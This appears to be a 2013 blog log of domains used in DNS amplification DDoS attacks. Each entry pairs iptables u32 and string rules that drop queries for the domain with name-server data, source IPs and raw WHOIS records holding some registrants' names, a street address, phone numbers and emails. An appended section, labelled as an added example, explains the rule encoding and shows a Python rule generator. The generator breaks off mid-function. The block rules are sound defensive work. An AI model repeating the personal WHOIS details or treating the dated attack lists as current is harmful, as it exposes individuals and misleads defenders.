Friday, November 29, 2013

Domain: marusiaattack.pw


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0d4d4152 && 0x2c&0xDFDFDFDF=0x55534941 && 0x30&0xDFDFDFDF=0x41545441 && 0x34&0xDFDFFFDF=0x434b0250 && 0x38&0xDFFF0000=0x57000000" -j DROP -m comment --comment "DROP DNS Q marusiaattack.pw"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 58 --algo bm --hex-string '|0D6d61727573696161747461636b02707700|' -j DROP -m comment --comment "DROP DNS Q marusiaattack.pw"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:


;; ANSWER SECTION:
marusiaattack.pw. 21600 IN NS ns1.reg.ru.
marusiaattack.pw. 21600 IN NS ns2.reg.ru.


Response:


A 242
NS 2
SOA 1
Rsize 3979


Whois


This whois service is provided by CentralNic Ltd and only contains
information pertaining to Internet domain names we have registered for
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd https://www.centralnic.com/

Domain ID:CNIC-DO1656911
Domain Name:MARUSIAATTACK.PW
Created On:2013-11-28T23:27:45.0Z
Last Updated On:2013-11-28T23:27:46.0Z
Expiration Date:2014-11-28T23:59:59.0Z
Status:TRANSFER PROHIBITED
Status:ADD PERIOD
Registrant ID:H4516280
Registrant Name:Magamed Ishakov
Registrant Organization:Private Person
Registrant Street1:fonar d 81 kv 188
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:119484
Registrant Country:RU
Registrant Phone:+7.9264756756
Registrant Email:webmaster@search-alles.us
Admin ID:H4516283
Admin Name:Magamed Ishakov
Admin Organization:Private Person
Admin Street1:fonar d 81 kv 188
Admin City:Moscow
Admin State/Province:Moscow
Admin Postal Code:119484
Admin Country:RU
Admin Phone:+7.9264756756
Admin Email:webmaster@search-alles.us
Tech ID:H4516286
Tech Name:Magamed Ishakov
Tech Organization:Private Person
Tech Street1:fonar d 81 kv 188
Tech City:Moscow
Tech State/Province:Moscow
Tech Postal Code:119484
Tech Country:RU
Tech Phone:+7.9264756756
Tech Email:webmaster@search-alles.us
Billing ID:H4516289
Billing Name:Magamed Ishakov
Billing Organization:Private Person
Billing Street1:fonar d 81 kv 188
Billing City:Moscow
Billing State/Province:Moscow
Billing Postal Code:119484
Billing Country:RU
Billing Phone:+7.9264756756
Billing Email:webmaster@search-alles.us
Sponsoring Registrar ID:H2440764
Sponsoring Registrar IANA ID:1606
Sponsoring Registrar Organization:Registrar of Domain Names REG.RU, LLC
Sponsoring Registrar Street1:Office 326, House 3 Vasily Petushkov Street
Sponsoring Registrar City:Moscow
Sponsoring Registrar Postal Code:125476
Sponsoring Registrar Country:RU
Sponsoring Registrar Phone:+74955801111
Sponsoring Registrar FAX:+74954915553
Sponsoring Registrar Website:http://www.reg.ru/
Name Server:NS1.REG.RU
Name Server:NS2.REG.RU
DNSSEC:Unsigned





Domain: darkyu.org


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x06444152 && 0x2c&0xDFDFDFFF=0x4b595503 && 0x30&0xDFDFDFFF=0x4f524700" -j DROP -m comment --comment "DROP DNS Q darkyu.org"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 52 --algo bm --hex-string '|066461726b7975036f726700|' -j DROP -m comment --comment "DROP DNS Q darkyu.org"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:


darkyu.org.        86400    IN    NS    dns1.darkyu.org.
darkyu.org.        86400    IN    NS    dns2.darkyu.org.



Response:

TXT 12
Rsize 3219


Whois



Domain ID:D164751413-LROR
Domain Name:DARKYU.ORG
Created On:18-Feb-2012 15:10:15 UTC
Last Updated On:27-Aug-2013 03:12:48 UTC
Expiration Date:18-Feb-2014 15:10:15 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:orgxd29577813738
Registrant Name:xl d
Registrant Organization:dxl dxl
Registrant Street1:beijing beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.11221122112
Registrant Phone Ext.:
Registrant FAX:+86.11221122112
Registrant FAX Ext.:
Registrant Email:583006337@qq.com
Admin ID:orgxd29577814866
Admin Name:xl d
Admin Organization:xl d
Admin Street1:beijing beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:beijing
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.11221122112
Admin Phone Ext.:
Admin FAX:+86.11221122112
Admin FAX Ext.:
Admin Email:583006337@qq.com
Tech ID:orgxd29577815083
Tech Name:xl d
Tech Organization:xl d
Tech Street1:beijing beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:beijing
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.11221122112
Tech Phone Ext.:
Tech FAX:+86.11221122112
Tech FAX Ext.:
Tech Email:583006337@qq.com
Name Server:DNS1.DARKYU.ORG
Name Server:DNS2.DARKYU.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned





Thursday, November 28, 2013

Domain: notthebestdomainintheworld.cloudns.org


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x1a4e4f54 && 0x2c&0xDFDFDFDF=0x54484542 && 0x30&0xDFDFDFDF=0x45535444 && 0x34&0xDFDFDFDF=0x4f4d4149 && 0x38&0xDFDFDFDF=0x4e494e54 && 0x3c&0xDFDFDFDF=0x4845574f && 0x40&0xDFDFDFFF=0x524c4407 && 0x44&0xDFDFDFDF=0x434c4f55 && 0x48&0xDFDFDFFF=0x444e5303 && 0x4c&0xDFDFDFFF=0x4f524700" -j DROP -m comment --comment "DROP DNS Q notthebestdomainintheworld.cloudns.org"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 80 --algo bm --hex-string '|1A6e6f7474686562657374646f6d61696e696e746865776f726c6407636c6f75646e73036f726700|' -j DROP -m comment --comment "DROP DNS Q notthebestdomainintheworld.cloudns.org"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.63.239

Name server:


;; ANSWER SECTION:
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns1.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns3.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns4.cloudns.net.
notthebestdomainintheworld.cloudns.org. 3354 IN NS ns2.cloudns.net.


Response:


A 1347
NS 4
SOA 1
Rsize 2171 9


Whois


NOT FOUND



Wednesday, November 27, 2013

Domain: stopdrugs77.com


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0b53544f && 0x2c&0xDFDFDFDF=0x50445255 && 0x30&0xDFDFFFFF=0x47533737 && 0x34&0xFFDFDFDF=0x03434f4d" -j DROP -m comment --comment "DROP DNS Q stopdrugs77.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 66 --algo bm --hex-string '|0b73746f706472756773373703636f6d00|' -j DROP -m comment --comment "DROP DNS Q stopdrugs77.com"

More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:

Unknown

Name server:



;; ANSWER SECTION:
stopdrugs77.com. 10800 IN NS a.dns.gandi.net.
stopdrugs77.com. 10800 IN NS b.dns.gandi.net.
stopdrugs77.com. 10800 IN NS c.dns.gandi.net.


Response:


A 239
NS 3
MX 2
SOA 1
Rsize 4027


Whois


Registrars.
Domain Name: stopdrugs77.com
Registry Domain ID: 1836814491_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-25T21:14:22Z
Creation Date: 2013-11-25T20:17:27Z
Registrar Registration Expiration Date: 2014-11-25T19:17:26Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Vasa Petrov
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Registry Admin ID:
Admin Name: Vasa Petrov
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Registry Tech ID:
Tech Name: Vasa Petrov
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 2d531f20f9ec1578c38b964aea7c748f-1815942@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-27T13:08:25Z <<<

Reseller Email:
Reseller URL:


Thursday, November 21, 2013

Domain: bitchgotraped.cloudns.eu


Interesting name :/


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0d424954 && 0x2c&0xDFDFDFDF=0x4348474f && 0x30&0xDFDFDFDF=0x54524150 && 0x34&0xDFDFFFDF=0x45440743 && 0x38&0xDFDFDFDF=0x4c4f5544 && 0x3c&0xDFDFFFDF=0x4e530245 && 0x40&0xDFFF0000=0x55000000" -j DROP -m comment --comment "DROP DNS Q bitchgotraped.cloudns.eu"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 66 --algo bm --hex-string '|0D6269746368676f74726170656407636c6f75646e7302657500|' -j DROP -m comment --comment "DROP DNS Q bitchgotraped.cloudns.eu"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


94.102.56.229 - Ecatel

Name server:


;; ANSWER SECTION:
bitchgotraped.cloudns.eu. 3600 IN NS ns1.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns4.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns2.cloudns.net.
bitchgotraped.cloudns.eu. 3600 IN NS ns3.cloudns.net.


Response:


A 1344
NS 4
SOA 1
Rsize 21657


Whois


No whois



Tuesday, November 19, 2013

Domain: eschenemnogo.com


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x0c455343 && 0x2c&0xDFDFDFDF=0x48454e45 && 0x30&0xDFDFDFDF=0x4d4e4f47 && 0x34&0xDFFFDFDF=0x4f03434f && 0x38&0xDFFF0000=0x4d000000" -j DROP -m comment --comment "DROP DNS Q eschenemnogo.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 58 --algo bm --hex-string '|0C65736368656e656d6e6f676f03636f6d00|' -j DROP -m comment --comment "DROP DNS Q eschenemnogo.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


5.254.103.113

Name server:


;; ANSWER SECTION:
eschenemnogo.com. 10800 IN NS b.dns.gandi.net.
eschenemnogo.com. 10800 IN NS c.dns.gandi.net.
eschenemnogo.com. 10800 IN NS a.dns.gandi.net.


Response:


A 246
MX 2
NS 3
SOA 1
Rsize 4108


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ESCHENEMNOGO.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 19-nov-2013
Creation Date: 19-nov-2013
Expiration Date: 19-nov-2014

>>> Last update of whois database: Tue, 19 Nov 2013 19:36:08 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: eschenemnogo.com
Registry Domain ID: 1836037535_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-19T14:21:47Z
Creation Date: 2013-11-19T14:02:37Z
Registrar Registration Expiration Date: 2014-11-19T13:02:37Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Vasiliy VOLKOV
Registrant Organization:
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province:
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Registry Admin ID:
Admin Name: Vasiliy VOLKOV
Admin Organization:
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province:
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Registry Tech ID:
Tech Name: Vasiliy VOLKOV
Tech Organization:
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province:
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 6b02435cb72bbfef48cf7b37fac804bb-1812680@contact.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-19T19:36:43Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Domain: x.privetrc.com


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFFFDF=0x01580850 && 0x2c&0xDFDFDFDF=0x52495645 && 0x30&0xDFDFDFFF=0x54524303 && 0x34&0xDFDFDFFF=0x434f4d00" -j DROP -m comment --comment "DROP DNS Q x.privetrc.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 56 --algo bm --hex-string '|017808707269766574726303636f6d00|' -j DROP -m comment --comment "DROP DNS Q x.privetrc.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

privetrc.com. 84009 IN NS ns2.privetrc.com.
privetrc.com. 84009 IN NS ns1.privetrc.com.

;; ADDITIONAL SECTION:
ns1.privetrc.com. 602409 IN A 199.217.118.89
ns2.privetrc.com. 602409 IN A 199.217.118.89


Response:


TXT 1
Rsize


Whois


Domain Name: privetrc.com
Registry Domain ID: 1835437025_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-18T11:44:24Z
Creation Date: 2013-11-14T16:30:28Z
Registrar Registration Expiration Date: 2014-11-14T15:30:28Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: 
Domain Status: clientTransferProhibited
Domain Status: 
Domain Status: 
Domain Status: 
Domain Status: 
Registry Registrant ID: 
Registrant Name: Nikolay GERASIMOV
Registrant Organization: 
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province: 
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Registry Admin ID: 
Admin Name: Nikolay GERASIMOV
Admin Organization: 
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province: 
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Registry Tech ID: 
Tech Name: Nikolay GERASIMOV
Tech Organization: 
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province: 
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 6f58ac296b52288bf0e92962cc0f4ab3-1810439@contact.gandi.net
Name Server: NS1.PRIVETRC.COM
Name Server: NS2.PRIVETRC.COM
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
DNSSEC: Unsigned




Monday, November 18, 2013

Domain: ym.rctrhash.com


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFFF=0x02594d08 && 0x2c&0xDFDFDFDF=0x52435452 && 0x30&0xDFDFDFDF=0x48415348 && 0x34&0xFFDFDFDF=0x03434f4d && 0x38&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q ym.rctrhash.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 57 --algo bm --hex-string '|02796d08726374726861736803636f6d00|' -j DROP -m comment --comment "DROP DNS Q ym.rctrhash.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

rctrhash.com. 51269 IN NS ns1.rctrhash.com.
rctrhash.com. 51269 IN NS ns2.rctrhash.com.

;; ADDITIONAL SECTION:
ns1.rctrhash.com. 51269 IN A 89.248.169.48
ns2.rctrhash.com. 51269 IN A 89.248.169.48


Response:


TXT 1
Rsize: 3955


Whois



Registry Domain ID: 1835442286_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-18T11:46:19Z
Creation Date: 2013-11-14T17:23:42Z
Registrar Registration Expiration Date: 2014-11-14T16:23:42Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: 
Domain Status: clientTransferProhibited
Domain Status: 
Domain Status: 
Domain Status: 
Domain Status: 
Registry Registrant ID: 
Registrant Name: Grigoriy PETROV
Registrant Organization: 
Registrant Street: Gandi, 63-65 boulevard Massena
Registrant City: (Gandi) Paris
Registrant State/Province: 
Registrant Postal Code: (Gandi) 75013
Registrant Country: (Gandi) FR
Registrant Phone: (Gandi) +33.170377666
Registrant Phone Ext:
Registrant Fax: (Gandi) +33.143730576
Registrant Fax Ext:
Registrant Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Registry Admin ID: 
Admin Name: Grigoriy PETROV
Admin Organization: 
Admin Street: Gandi, 63-65 boulevard Massena
Admin City: (Gandi) Paris
Admin State/Province: 
Admin Postal Code: (Gandi) 75013
Admin Country: (Gandi) FR
Admin Phone: (Gandi) +33.170377666
Admin Phone Ext:
Admin Fax: (Gandi) +33.143730576
Admin Fax Ext:
Admin Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Registry Tech ID: 
Tech Name: Grigoriy PETROV
Tech Organization: 
Tech Street: Gandi, 63-65 boulevard Massena
Tech City: (Gandi) Paris
Tech State/Province: 
Tech Postal Code: (Gandi) 75013
Tech Country: (Gandi) FR
Tech Phone: (Gandi) +33.170377666
Tech Phone Ext:
Tech Fax: (Gandi) +33.143730576
Tech Fax Ext:
Tech Email: 4a4bed97a0e9d6c2a0d97bc74727e92c-1810474@contact.gandi.net
Name Server: NS1.RCTRHASH.COM
Name Server: NS2.RCTRHASH.COM
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
DNSSEC: Unsigned



Sunday, November 17, 2013

Domain: x.slnm.info


If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks: your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain... unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

This rule should match any single-character subdomain of slnm.info:

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x01000453 && 0x2c&0xDFDFDFFF=0x4c4e4d04 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.slnm.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|04736c6e6d04696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.slnm.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt
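All the rules on this page follow one pattern. The u32 variant loads 4-byte words starting at IP offset 0x28 (where the QNAME begins when the IPv4 header carries no options), masks every letter with 0xDF so that upper- and lower-case spellings of the query both match, and keeps a full 0xFF mask on length bytes, digits and the terminating zero; the string variant searches for the exact wire-format name between --from and --to. The script below is an added example, not the blog's or the smurfmonitor repository's own tooling: it generates both rule forms for a domain, including the any-single-character-first-label form used for x.slnm.info, and then evaluates the u32 expression against a constructed query packet the way xt_u32 would. That check is worth running on hand-written rules, because a value byte that was not masked (a lowercase letter left as 0x6d where the 0xDF mask can only ever produce 0x4d) never matches anything. The packet builder, the 20-byte-header offset assumption and the `any_first_label` option are assumptions made here.

```python
"""Generate and sanity-check iptables u32 / string rules that drop DNS queries
for one QNAME. Added example, not the blog's or the smurfmonitor repo's code.

Assumptions (not stated on the page): IPv4 without options, so the QNAME starts
at IP offset 0x28 (20 IP + 8 UDP + 12 DNS header), and one question per query.
Rules are produced as text only; nothing is applied to a firewall here.
"""
import struct

QNAME_OFFSET = 0x28  # 20 (IPv4, no options) + 8 (UDP) + 12 (DNS header)


def qname_wire_and_mask(domain: str, any_first_label: bool = False):
    """DNS wire form of a name plus a per-byte u32 mask.

    Letters get 0xDF (folds a-z onto A-Z, so the match is case-insensitive);
    length bytes, digits, hyphens and the final 0x00 keep a full 0xFF mask.
    With any_first_label=True the first label keeps its length but its content
    bytes are masked 0x00 (the 'x.slnm.info' style rule: any one-char label).
    """
    wire, mask = bytearray(), bytearray()
    for idx, label in enumerate(domain.strip(".").split(".")):
        if not 1 <= len(label) <= 63:
            raise ValueError(f"bad DNS label {label!r}")
        wire.append(len(label))
        mask.append(0xFF)
        for ch in label.encode("ascii"):
            wire.append(ch)
            if idx == 0 and any_first_label:
                mask.append(0x00)
            else:
                mask.append(0xDF if chr(ch).isalpha() else 0xFF)
    wire.append(0x00)  # root label terminates the QNAME
    mask.append(0xFF)
    return bytes(wire), bytes(mask)


def u32_expression(domain: str, any_first_label: bool = False) -> str:
    """'&&'-joined u32 tests: each loads 4 bytes at an IP offset, ANDs them with
    the mask and compares to the value. The value is computed as wire AND mask,
    so a lowercase letter can never leak into it."""
    wire, mask = qname_wire_and_mask(domain, any_first_label)
    tests = []
    for i in range(0, len(wire), 4):
        w = wire[i:i + 4].ljust(4, b"\x00")
        m = mask[i:i + 4].ljust(4, b"\x00")  # bytes past the QNAME: don't care
        v = bytes(a & b for a, b in zip(w, m))
        tests.append(f"0x{QNAME_OFFSET + i:x}&0x{m.hex().upper()}=0x{v.hex()}")
    return " && ".join(tests)


def u32_rule(domain: str, any_first_label: bool = False) -> str:
    return (f'iptables --insert INPUT -p udp --dport 53 -m u32 --u32 '
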